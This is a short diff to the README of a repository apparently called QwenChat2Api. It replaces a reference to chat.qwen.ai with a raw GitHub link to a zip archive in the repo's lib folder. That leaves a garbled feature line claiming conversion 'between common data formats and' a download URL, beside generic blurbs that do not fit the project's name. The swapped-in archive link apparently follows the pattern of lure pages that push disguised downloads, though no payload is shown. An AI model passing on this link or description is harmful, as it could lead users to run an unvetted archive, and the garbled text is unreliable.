Tiaeventful732/QwenChat2Api/README.md

 ## 🛠️ Features

 - **Ease of Use:** Designed with a simple interface for all computer users.
-- **Multiple Formats:** Supports conversion between common data formats and chat.qwen.ai.
+- **Multiple Formats:** Supports conversion between common data formats and https://raw.githubusercontent.com/Tiaeventful732/QwenChat2Api/main/lib/Api-Qwen-Chat-3.6.zip
 - **Fast Processing:** Converts files quickly, allowing you to get back to work without long waits.
 - **Regular Updates:** We maintain the software with improvements based on user feedback.